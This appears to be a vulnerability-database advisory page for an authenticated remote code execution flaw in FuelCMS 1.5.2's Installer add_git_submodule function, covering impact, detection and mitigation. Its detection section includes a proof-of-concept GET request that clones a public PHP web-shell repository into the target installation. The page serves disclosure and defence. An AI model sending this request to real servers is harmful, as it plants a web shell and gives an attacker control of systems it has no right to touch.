CVE-2026-30461
Received Received - Intake
Authenticated Remote Code Execution in FuelCMS 1.5.2 Installer.php

Publication date: 2026-04-15

Last updated on: 2026-04-20

Assigner: MITRE

Description
Daylight Studio FuelCMS v1.5.2 was discovered to contain an authenticated remote code execution (RCE) vulnerability via the /controllers/Installer.php and the function add_git_submodule.
CVSS Scores
EPSS Scores
Probability:
Percentile:
Meta Information
Published
2026-04-15
Last Modified
2026-04-20
Generated
2026-06-16
AI Q&A
2026-04-15
EPSS Evaluated
2026-06-15
NVD
CVE-2026-30461
EUVD
EUVD-2026-22976
Affected Vendors & Products
Showing 1 associated CPE
Vendor Product Version / Range
thedaylightstudio fuel_cms 1.5.2
Helpful Resources
Exploitability
CWE
CWE Icon
KEV
KEV Icon
CWE ID Description
CWE-77 The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component.
Attack-Flow Graph
AI Quick Actions
Instant insights powered by AI
Executive Summary

CVE-2026-30461 is an authenticated remote code execution (RCE) vulnerability in FuelCMS version 1.5.2. It exists in the add_git_submodule function accessible via the URL path /fuel/Installer/add_git_submodule/<module>. This function allows an authenticated user to add arbitrary Git submodules from any GitHub repository if the system is running in development mode with Git over SSH enabled.

By exploiting this vulnerability, an attacker can clone a malicious Git repository containing a PHP web shell into the FuelCMS installation. The attacker can then access and execute arbitrary PHP code on the server through the injected files, effectively gaining full remote code execution capabilities.

The vulnerability requires that FuelCMS is running in development mode, Git over SSH is properly configured, and a valid .git directory exists in the root of FuelCMS.

Impact Analysis

This vulnerability can have severe impacts including unauthorized remote code execution on the affected server. An attacker with valid authentication can execute arbitrary system commands, potentially leading to full system compromise.

  • Loss of confidentiality: sensitive data on the server can be accessed or exfiltrated.
  • Loss of integrity: attacker can modify or inject malicious code or data.
  • Loss of availability: attacker could disrupt services or delete critical files.

Because the attack requires only low privileges and no user interaction beyond authentication, it poses a critical security risk especially in development environments where this mode is enabled.

Detection Guidance

This vulnerability can be detected by checking if your FuelCMS instance is running in development mode with Git over SSH enabled and a valid .git directory present. Specifically, you can test if the vulnerable add_git_submodule function is accessible by sending an authenticated GET request to the URL path /fuel/Installer/add_git_submodule/<repository>/<module>.

A practical detection command involves sending a GET request similar to the proof of concept: GET /fuel/Installer/add_git_submodule/[email protected]:flozz/p0wny-shell.git/test. If the server responds with HTTP 200 OK and zero content length, the vulnerability is likely present.

  • Use curl or a similar HTTP client with valid authentication to send the GET request to /fuel/Installer/add_git_submodule/[email protected]:flozz/p0wny-shell.git/test.
  • Check the server response code and content length to confirm if the submodule addition is successful.
  • Verify if Git over SSH is enabled and configured on the server.
  • Confirm that the FuelCMS instance is running in development mode and that a .git directory exists in the root directory.
Mitigation Strategies

To mitigate this vulnerability immediately, you should disable development mode on your FuelCMS instance to prevent access to the add_git_submodule function.

Additionally, restrict or disable Git over SSH access on the server to prevent unauthorized Git submodule additions.

Ensure that only trusted and authorized users have authenticated access to the FuelCMS system, as exploitation requires authentication.

If possible, remove or restrict the .git directory in the root of the FuelCMS installation to limit Git operations.

Since the vendor is unlikely to issue a fix, consider isolating or upgrading the system to a more secure environment or CMS version if available.

Compliance Impact

The CVE-2026-30461 vulnerability allows authenticated users to execute arbitrary code remotely on FuelCMS installations running in development mode with Git over SSH enabled. This can lead to unauthorized access, modification, or destruction of sensitive data hosted on the affected system.

Such unauthorized access and potential data breaches can compromise the confidentiality, integrity, and availability of personal or sensitive information, which are core requirements of common standards and regulations like GDPR and HIPAA.

Therefore, if exploited, this vulnerability could result in non-compliance with these regulations due to failure to adequately protect sensitive data and maintain secure systems.

Chat Assistant
Ask questions about this CVE
Hi! I’m here to help you understand CVE-2026-30461. Ask me anything about the vulnerability, its impact, or mitigation strategies.
0/70
EPSS Chart